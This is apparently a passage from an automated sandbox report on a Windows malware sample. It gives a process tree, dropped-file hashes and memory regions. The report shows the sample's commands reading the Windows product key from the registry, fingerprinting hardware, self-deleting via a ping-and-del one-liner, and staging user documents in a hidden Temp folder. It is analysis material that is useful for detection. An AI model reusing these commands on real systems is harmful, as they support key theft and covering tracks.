                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                          4⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:5836
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                        3⤵
                                                                          PID:2212
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic path win32_VideoController get name
                                                                            4⤵
                                                                            • Detects videocard installed
                                                                            PID:1132
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                          3⤵
                                                                            PID:3948
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                              4⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:4152
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
                                                                            3⤵
                                                                              PID:6008
                                                                              • C:\Windows\system32\PING.EXE
                                                                                ping localhost -n 3
                                                                                4⤵
                                                                                • Runs ping.exe
                                                                                PID:6128
                                                                        • C:\Windows\system32\BackgroundTransferHost.exe
                                                                          "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                          1⤵
                                                                            PID:3624

                                                                          Network

                                                                          MITRE ATT&CK Enterprise v15

                                                                          Replay Monitor

                                                                          Loading Replay Monitor...

                                                                          Downloads

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                            Filesize

                                                                            3KB

                                                                            MD5

                                                                            74e4a39ae145a98de20041613220dfed

                                                                            SHA1

                                                                            ac5dd2331ae591d7d361e8947e1a8fba2c6bea12

                                                                            SHA256

                                                                            2c42785f059fe30db95b10a87f8cb64a16abc3aa47cb655443bdec747244ec36

                                                                            SHA512

                                                                            96ba3135875b0fe7a07a3cf26ad86e0df438730c8f38df8f10138184dacd84b8e0cded7e3e84475d11057ceefe2e357136762b9c9452fbb938c094323c6b729b

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Filesize

                                                                            944B

                                                                            MD5

                                                                            45f53352160cf0903c729c35c8edfdce

                                                                            SHA1

                                                                            b35a4d4fbaf2a3cc61e540fc03516dd70f3c34ab

                                                                            SHA256

                                                                            9cf18d157a858fc143a6de5c2dd3f618516a527b34478ac478d8c94ff027b0d2

                                                                            SHA512

                                                                            e3fa27a80a1df58acb49106c306dab22e5ed582f6b0cd7d9c3ef0a85e9f5919333257e88aa44f42a0e095fd577c9e12a02957a7845c0d109f821f32d8d3343f3

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Filesize

                                                                            944B

                                                                            MD5

                                                                            aa4f31835d07347297d35862c9045f4a

                                                                            SHA1

                                                                            83e728008935d30f98e5480fba4fbccf10cefb05

                                                                            SHA256

                                                                            99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

                                                                            SHA512

                                                                            ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Filesize

                                                                            944B

                                                                            MD5

                                                                            05b3cd21c1ec02f04caba773186ee8d0

                                                                            SHA1

                                                                            39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

                                                                            SHA256

                                                                            911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

                                                                            SHA512

                                                                            e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            7f5716b841d70b669ff4456c6b5a035c

                                                                            SHA1

                                                                            5eee6aaf2da8c1da9ab5714f52395e713e2c6f5e

                                                                            SHA256

                                                                            6490ac8dd046926e9e2efe3cc1af57ff92bf2075de7c32a7a8c73323677dcecd

                                                                            SHA512

                                                                            d0a0af921a1c91c377a2c2143abead338ae3c763379f6869fdf0b7b9ef32eb15193b0f5abb0c208c536ccee8e48c2ced62ecf867f834c0067fdc1149f7bde52e

                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            7332074ae2b01262736b6fbd9e100dac

                                                                            SHA1

                                                                            22f992165065107cc9417fa4117240d84414a13c

                                                                            SHA256

                                                                            baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

                                                                            SHA512

                                                                            4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

                                                                          • C:\Users\Admin\AppData\Local\Temp\RESE0FA.tmp

                                                                            Filesize

                                                                            1KB

                                                                            MD5

                                                                            ad3b240a9251c6608c23041218d1b4dd

                                                                            SHA1

                                                                            08db81cd01658cef14d18092036fd7fe89a15bc2

                                                                            SHA256

                                                                            a8f6e1f6eed07e8613436ffb53ab156cdb1ec0120fd7b09f6016102247476230

                                                                            SHA512

                                                                            0d8275c394e5b9101fa7abd353d5c5d5db025ecb9160e3b4591c688cb67c53972e25007085a49ed17a61dd083c20d90607df26f14a7bdaa6ffd9374b56c04a00

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\VCRUNTIME140.dll

                                                                            Filesize

                                                                            95KB

                                                                            MD5

                                                                            f34eb034aa4a9735218686590cba2e8b

                                                                            SHA1

                                                                            2bc20acdcb201676b77a66fa7ec6b53fa2644713

                                                                            SHA256

                                                                            9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1

                                                                            SHA512

                                                                            d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\_bz2.pyd

                                                                            Filesize

                                                                            47KB

                                                                            MD5

                                                                            f6e387f20808828796e876682a328e98

                                                                            SHA1

                                                                            6679ae43b0634ac706218996bac961bef4138a02

                                                                            SHA256

                                                                            8886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b

                                                                            SHA512

                                                                            ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\_ctypes.pyd

                                                                            Filesize

                                                                            58KB

                                                                            MD5

                                                                            48ce90022e97f72114a95630ba43b8fb

                                                                            SHA1

                                                                            f2eba0434ec204d8c6ca4f01af33ef34f09b52fd

                                                                            SHA256

                                                                            5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635

                                                                            SHA512

                                                                            7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\_decimal.pyd

                                                                            Filesize

                                                                            105KB

                                                                            MD5

                                                                            2030438e4f397a7d4241a701a3ca2419

                                                                            SHA1

                                                                            28b8d06135cd1f784ccabda39432cc83ba22daf7

                                                                            SHA256

                                                                            07d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72

                                                                            SHA512

                                                                            767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\_hashlib.pyd

                                                                            Filesize

                                                                            35KB

                                                                            MD5

                                                                            13f99120a244ab62af1684fbbc5d5a7e

                                                                            SHA1

                                                                            5147a90082eb3cd2c34b7f2deb8a4ef24d7ae724

                                                                            SHA256

                                                                            11658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b

                                                                            SHA512

                                                                            46c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\_lzma.pyd

                                                                            Filesize

                                                                            85KB

                                                                            MD5

                                                                            7c66f33a67fbb4d99041f085ef3c6428

                                                                            SHA1

                                                                            e1384891df177b45b889459c503985b113e754a3

                                                                            SHA256

                                                                            32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866

                                                                            SHA512

                                                                            d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\_queue.pyd

                                                                            Filesize

                                                                            25KB

                                                                            MD5

                                                                            f9d8b75ccb258b8bc4eef7311c6d611d

                                                                            SHA1

                                                                            1b48555c39a36f035699189329cda133b63e36b5

                                                                            SHA256

                                                                            b3d9763fc71b001a1a2cc430946933e3832f859eb7857b590f8daeef8017179c

                                                                            SHA512

                                                                            cbf8490501b002eec96ae6c1fa4f3684aa1cab1e63025087df92c0e857299b9b498bff91c1f301f926ff86e0dc81e8f0c17db992366bed3cd9f41bcae43542db

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\_socket.pyd

                                                                            Filesize

                                                                            42KB

                                                                            MD5

                                                                            0dd957099cf15d172d0a343886fb7c66

                                                                            SHA1

                                                                            950f7f15c6accffac699c5db6ce475365821b92a

                                                                            SHA256

                                                                            8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a

                                                                            SHA512

                                                                            3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\_sqlite3.pyd

                                                                            Filesize

                                                                            49KB

                                                                            MD5

                                                                            dde6bab39abd5fce90860584d4e35f49

                                                                            SHA1

                                                                            23e27776241b60f7c936000e72376c4a5180b935

                                                                            SHA256

                                                                            c84e5f739ce046b4582663a3017f31fe9ae5e706e087ac4c5ff11c7bba07b5f9

                                                                            SHA512

                                                                            8190c6befbe660096363409cb82977e9dce5ab9a78c60f3d3db9dc08a2300504f9b2058d8cfb740d7a17995267d8005392ee0f1a03fb74030286fbc7a9c287de

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\_ssl.pyd

                                                                            Filesize

                                                                            62KB

                                                                            MD5

                                                                            a4dba3f258344390ee9929b93754f673

                                                                            SHA1

                                                                            75bbf00e79bb25f93455a806d0cd951bdd305752

                                                                            SHA256

                                                                            e0aa8cfa2e383820561bce2aee35b77a6902ff383076c237c7859cd894d37f49

                                                                            SHA512

                                                                            6201e0d840f85d1627db849bfaf4a32f6fc0634a16416074fe6d13329317520b0a06806ad3337a3370dcc1c1e3d1910d18c823c6a7a62efe400de36b28d1767a

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\base_library.zip

                                                                            Filesize

                                                                            859KB

                                                                            MD5

                                                                            483d9675ef53a13327e7dfc7d09f23fe

                                                                            SHA1

                                                                            2378f1db6292cd8dc4ad95763a42ad49aeb11337

                                                                            SHA256

                                                                            70c28ec0770edefcef46fa27aaa08ba8dc22a31acd6f84cb0b99257dca1b629e

                                                                            SHA512

                                                                            f905eb1817d7d4cc1f65e3a5a01bade761bca15c4a24af7097bc8f3f2b43b00e000d6ea23cd054c391d3fdc2f1114f2af43c8bb6d97c1a0ce747763260a864f5

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\blank.aes

                                                                            Filesize

                                                                            72KB

                                                                            MD5

                                                                            080c74e923b5d65a5401c3a710e2a2e6

                                                                            SHA1

                                                                            e019f936c47cd253ec1a3d12e6d7d2f5134c162c

                                                                            SHA256

                                                                            aacca12b747d20dd3920953dcb920dd7add680e3209b18c1ebbb19649a3448d3

                                                                            SHA512

                                                                            b5d3e4c9d3c93b65e9af4dfc4ec81202e5da9039614d673be96143b0e74ab8854c05fd46054f838f4e6630e4607ae3369414bb9b0cb33767e7a5b8fb5c0d81ad

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\bound.blank

                                                                            Filesize

                                                                            27.4MB

                                                                            MD5

                                                                            a6121c74c818b5dbf766966984850d20

                                                                            SHA1

                                                                            c5d1476aa364e0c8c420f50dd446fd6d38e02cf1

                                                                            SHA256

                                                                            df86e3da5817a079d8a1c36606484cc2805f69be8ef09439f4c0ecc9d72f4948

                                                                            SHA512

                                                                            d52d183bdc4a0e5bbeab160578316cbd97f0485281d9170fa82be13e0472c32735e8e35650c405aa151776ff7bb58afbdd8d241563b949a5281ee76bb75217d3

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\libcrypto-1_1.dll

                                                                            Filesize

                                                                            1.1MB

                                                                            MD5

                                                                            e5aecaf59c67d6dd7c7979dfb49ed3b0

                                                                            SHA1

                                                                            b0a292065e1b3875f015277b90d183b875451450

                                                                            SHA256

                                                                            9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1

                                                                            SHA512

                                                                            145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\libffi-7.dll

                                                                            Filesize

                                                                            23KB

                                                                            MD5

                                                                            6f818913fafe8e4df7fedc46131f201f

                                                                            SHA1

                                                                            bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

                                                                            SHA256

                                                                            3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

                                                                            SHA512

                                                                            5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\libssl-1_1.dll

                                                                            Filesize

                                                                            203KB

                                                                            MD5

                                                                            7bcb0f97635b91097398fd1b7410b3bc

                                                                            SHA1

                                                                            7d4fc6b820c465d46f934a5610bc215263ee6d3e

                                                                            SHA256

                                                                            abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e

                                                                            SHA512

                                                                            835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\python310.dll

                                                                            Filesize

                                                                            1.4MB

                                                                            MD5

                                                                            3f782cf7874b03c1d20ed90d370f4329

                                                                            SHA1

                                                                            08a2b4a21092321de1dcad1bb2afb660b0fa7749

                                                                            SHA256

                                                                            2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6

                                                                            SHA512

                                                                            950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\rar.exe

                                                                            Filesize

                                                                            615KB

                                                                            MD5

                                                                            9c223575ae5b9544bc3d69ac6364f75e

                                                                            SHA1

                                                                            8a1cb5ee02c742e937febc57609ac312247ba386

                                                                            SHA256

                                                                            90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                            SHA512

                                                                            57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\rarreg.key

                                                                            Filesize

                                                                            456B

                                                                            MD5

                                                                            4531984cad7dacf24c086830068c4abe

                                                                            SHA1

                                                                            fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                            SHA256

                                                                            58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                            SHA512

                                                                            00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\select.pyd

                                                                            Filesize

                                                                            25KB

                                                                            MD5

                                                                            5c66bcf3cc3c364ecac7cf40ad28d8f0

                                                                            SHA1

                                                                            faf0848c231bf120dc9f749f726c807874d9d612

                                                                            SHA256

                                                                            26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc

                                                                            SHA512

                                                                            034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\sqlite3.dll

                                                                            Filesize

                                                                            622KB

                                                                            MD5

                                                                            ad4bcb50bb8309e4bbda374c01fab914

                                                                            SHA1

                                                                            a299963016a3d5386bf83584a073754c6b84b236

                                                                            SHA256

                                                                            32c0978437c9163bb12606607e88701dd79400cdde926d890cdbf6334c2b8435

                                                                            SHA512

                                                                            ba6bfa3c27fa4285eeb2978ff17cba94375d84d7c0f79150d1f2f7163c80c347b84d712da83435e8d13e27ed59ea0375edb5af2ea1ba67b2c77b6dfcb62ad65a

                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI8162\unicodedata.pyd

                                                                            Filesize

                                                                            289KB

                                                                            MD5

                                                                            dfa1f0cd0ad295b31cb9dda2803bbd8c

                                                                            SHA1

                                                                            cc68460feae2ff4e9d85a72be58c8011cb318bc2

                                                                            SHA256

                                                                            46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10

                                                                            SHA512

                                                                            7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e

                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2yllwmou.y2w.ps1

                                                                            Filesize

                                                                            60B

                                                                            MD5

                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                            SHA1

                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                            SHA256

                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                            SHA512

                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                          • C:\Users\Admin\AppData\Local\Temp\bound.exe

                                                                            Filesize

                                                                            27.7MB

                                                                            MD5

                                                                            9735797853cba809b13c8396c91354a0

                                                                            SHA1

                                                                            6d6882c03451d28d96ad75fc45364f69d48b3af9

                                                                            SHA256

                                                                            cdfd70cb02bfd0c5d8db7e2525ee52a4a4fd351a33190d9698880fdfe6460f7e

                                                                            SHA512

                                                                            14b6d09474c482ef75fedf35bb38b3c95ae4e2db8a6f371c48cb374cd5010df2537f1ed1080d5b3980214a090b67eed8883394b02f8eac396650c44d126fbd6d

                                                                          • C:\Users\Admin\AppData\Local\Temp\kgnvy5qm\kgnvy5qm.dll

                                                                            Filesize

                                                                            4KB

                                                                            MD5

                                                                            52a9123b7e58611ee36a98c583ada163

                                                                            SHA1

                                                                            b29dd895d2b83ec6e77b701eb97e11a5cdd439a4

                                                                            SHA256

                                                                            242273d2f18344c4524af5031d0973c982c7f5006ab2cec707ad3cacae3e3c17

                                                                            SHA512

                                                                            d5aef3d327eda8797ca365a5cdb63357314d3ef8a51e232894d19f232ee28adb8499c71000d201272a356d18de26633ec8f4803a6770a8da770da921d0d4c72c

                                                                          • C:\Users\Admin\AppData\Local\Temp\     ‎  ‎ \Common Files\Desktop\BackupSubmit.m4v

                                                                            Filesize

                                                                            849KB

                                                                            MD5

                                                                            a04c859c673bac7d2260a4211cf6c0cd

                                                                            SHA1

                                                                            c2e9b3c9b345c7495f97642578653c34023fe094

                                                                            SHA256

                                                                            586387e9d0c86dcfc21e0e1f62749e3e0b5c9183ffa5826efe7c114f8d51e852

                                                                            SHA512

                                                                            d24ff7897022fe4525d475db033432ffc87f67d8d842abae3aeff4c5b01458838854d97e5f9fe527503f522d2e1bcb7091f0565d6abaac4b1ca573ee2611462c

                                                                          • C:\Users\Admin\AppData\Local\Temp\     ‎  ‎ \Common Files\Desktop\ClearSubmit.docx

                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            384dbe8ddbaf53927c522528f86d8aee

                                                                            SHA1

                                                                            a85a9800c79cb2534f64116b52ff8c7d1ab60759

                                                                            SHA256

                                                                            acf96f37a9be26211ce3a5374ee634f6983f153507bbae1acc7712172740143b

                                                                            SHA512

                                                                            aac39be4214697eaf2754b509b2cf3fc18c5374973f4deb22c32ccef1276d045af26a6f82cc74ae21759bc1180b3f2a1199ae5fd973e6b2ab75b116eb5d64c49

                                                                          • C:\Users\Admin\AppData\Local\Temp\     ‎  ‎ \Common Files\Desktop\CompleteFind.docx

                                                                            Filesize

                                                                            19KB

                                                                            MD5

                                                                            d4e48b6953923fd0b0a17e07e15d58ce

                                                                            SHA1

                                                                            194b47081d222b7c6371e4c0ad91b576bb7239ef

                                                                            SHA256

                                                                            35a97c1720a96a6ab40772d7556975a4ef6a5d5ba83adc1d254da23d2eff0d96

                                                                            SHA512

                                                                            1f89102ce1db47968fab03bfe2175f001d5b52ab5114cf5eddc8d3b40883f8d6d08c878eb74464771c74e938cadd0150be0ddfefe1057c0aaf05a5d19e792099

                                                                          • C:\Users\Admin\AppData\Local\Temp\     ‎  ‎ \Common Files\Desktop\CopyJoin.docx

                                                                            Filesize

                                                                            18KB

                                                                            MD5

                                                                            258477d3defdb3971bde567348cd5168

                                                                            SHA1

                                                                            70c36730fdb13b237f7dfb5ad472b5cdf70c746f

                                                                            SHA256

                                                                            e152f1e704c6abf5b50d75dbd4daca0134573bd4194f41dd8810ad78183e008a

                                                                            SHA512

                                                                            be0b073e072fb262ef28bd97bd57318b6300fb59537a370d395465b59f34aea36843a9130af6139f8df60ac4d5c52564480b03e5bb104e6c3c9a9f1f7944653b

                                                                          • C:\Users\Admin\AppData\Local\Temp\     ‎  ‎ \Common Files\Desktop\LockStep.xlsx

                                                                            Filesize

                                                                            11KB

                                                                            MD5

                                                                            d65c81783efcb933e562900f5459a510

                                                                            SHA1

                                                                            7fc99ec51d83c2d4c68056d7ffc805a68ee98268

                                                                            SHA256

                                                                            365161fbdc1bda640ceb0dac5799088a53695059566643d96ba39908547e8e1f

                                                                            SHA512

                                                                            7f12254fa394fcf12cd6aa963cbb285791a9fed352c3eed4fee747e2cefd40ae3c721ece8e710db5da76408ff8e3c4a6ccaa7c643821a12b888044cdca096b8b

                                                                          • C:\Windows\System32\drivers\etc\hosts

                                                                            Filesize

                                                                            2KB

                                                                            MD5

                                                                            f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                            SHA1

                                                                            e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                            SHA256

                                                                            a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                            SHA512

                                                                            c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                          • C:\Windows\Temp\{1AF03169-8C25-4833-98D6-266101DAE96E}\.ba\PythonBA.dll

                                                                            Filesize

                                                                            666KB

                                                                            MD5

                                                                            da54d072d23ca56df835be52f5653b25

                                                                            SHA1

                                                                            f3769458082002edfcb5d67e98d2f95b415bc7cd

                                                                            SHA256

                                                                            049c8ef71d7f7d0789b9da0b28233b9825fe62d015dca94ff540edf5ff08c6cf

                                                                            SHA512

                                                                            0c1617db244768b2b434529e641b1889fe2ba456980646ef73a73d43d10bfa76cabf68fd9ccaa8f091472fd75ae9ae58ca69a069d6f3008f5409de7454a5d073

                                                                          • C:\Windows\Temp\{1AF03169-8C25-4833-98D6-266101DAE96E}\.ba\SideBar.png

                                                                            Filesize

                                                                            50KB

                                                                            MD5

                                                                            888eb713a0095756252058c9727e088a

                                                                            SHA1

                                                                            c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4

                                                                            SHA256

                                                                            79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067

                                                                            SHA512

                                                                            7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0

                                                                          • C:\Windows\Temp\{E3F65CF2-802A-4BBA-8F84-10018EFBC99A}\.cr\bound.exe

                                                                            Filesize

                                                                            854KB

                                                                            MD5

                                                                            b42274157624161b7d21c7aae28eee02

                                                                            SHA1

                                                                            1ef25ff111eba87d03e0df3c8817ff1163a69bbb

                                                                            SHA256

                                                                            b2f72c42b2e6a44bcd655124522b9fa67271861665aecd12edc6c01e5bd3f03e

                                                                            SHA512

                                                                            d0d596cbde763c20ea4d600631b9757e976a03edd866b4fa8085b0cdfa777a98167f4ff0166d52b0aef9d731a18cf62d1225b8cb6cabefe25f5a4a62bdb47a70

                                                                          • \??\c:\Users\Admin\AppData\Local\Temp\kgnvy5qm\CSC6B22415FED8E46BCBB31F514185E7EF.TMP

                                                                            Filesize

                                                                            652B

                                                                            MD5

                                                                            634866ecb827ba2e00e6d7b4110ed2cd

                                                                            SHA1

                                                                            7ca0a02deeee6b44f0a845d3b2cb2070e6a4330c

                                                                            SHA256

                                                                            2a370fff8b7238eaf3fb12127f6c36792fd9f3ef297d48f1e9b7b5ab793c6419

                                                                            SHA512

                                                                            157902b63c094cec771ba485225d181a6abb64ec40167b7db9e4837e5f47ac1020809050b8a60fe479a81d30d2d725b3c8cca5861426fc3387e17172dd9bda16

                                                                          • \??\c:\Users\Admin\AppData\Local\Temp\kgnvy5qm\kgnvy5qm.0.cs

                                                                            Filesize

                                                                            1004B

                                                                            MD5

                                                                            c76055a0388b713a1eabe16130684dc3

                                                                            SHA1

                                                                            ee11e84cf41d8a43340f7102e17660072906c402

                                                                            SHA256

                                                                            8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                            SHA512

                                                                            22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                          • \??\c:\Users\Admin\AppData\Local\Temp\kgnvy5qm\kgnvy5qm.cmdline

                                                                            Filesize

                                                                            607B

                                                                            MD5

                                                                            d84920e4354dde648674882c9b8f2781

                                                                            SHA1

                                                                            e9bdd059d2f6d6c8b6bd6aaaf9cfa1c58900cfb6

                                                                            SHA256

                                                                            6d5b4c5944e32edb32ebbd753b67cb975ff737de1ec7b2f274fce2449325d6ee

                                                                            SHA512

                                                                            392007261a51dd9e8d3ee888d378587bca342a351f7dd50af766f1ab754b9109a7506cca22ebd4dd6812063d22b019df7ee85527b5f8ad4f12748407b6ee73a0

                                                                          • memory/796-258-0x00007FF832010000-0x00007FF832AD2000-memory.dmp

                                                                            Filesize

                                                                            10.8MB

                                                                          • memory/796-91-0x000001F98C8A0000-0x000001F98C8C2000-memory.dmp

                                                                            Filesize

                                                                            136KB

                                                                          • memory/796-82-0x00007FF832010000-0x00007FF832AD2000-memory.dmp

                                                                            Filesize

                                                                            10.8MB

                                                                          • memory/796-81-0x00007FF832010000-0x00007FF832AD2000-memory.dmp

                                                                            Filesize

                                                                            10.8MB

                                                                          • memory/796-80-0x00007FF832013000-0x00007FF832015000-memory.dmp

                                                                            Filesize

                                                                            8KB

                                                                          • memory/840-256-0x000001EE7A5E0000-0x000001EE7A5E8000-memory.dmp

                                                                            Filesize

                                                                            32KB

                                                                          • memory/2784-33-0x00007FF84E910000-0x00007FF84E91F000-memory.dmp

                                                                            Filesize

                                                                            60KB

                                                                          • memory/2784-356-0x00007FF8450A0000-0x00007FF8450CE000-memory.dmp

                                                                            Filesize

                                                                            184KB

                                                                          • memory/2784-78-0x00007FF8490A0000-0x00007FF8490AD000-memory.dmp

                                                                            Filesize

                                                                            52KB

                                                                          • memory/2784-72-0x00007FF844D20000-0x00007FF844DD8000-memory.dmp

                                                                            Filesize

                                                                            736KB

                                                                          • memory/2784-73-0x00007FF832AE0000-0x00007FF832E55000-memory.dmp

                                                                            Filesize

                                                                            3.5MB

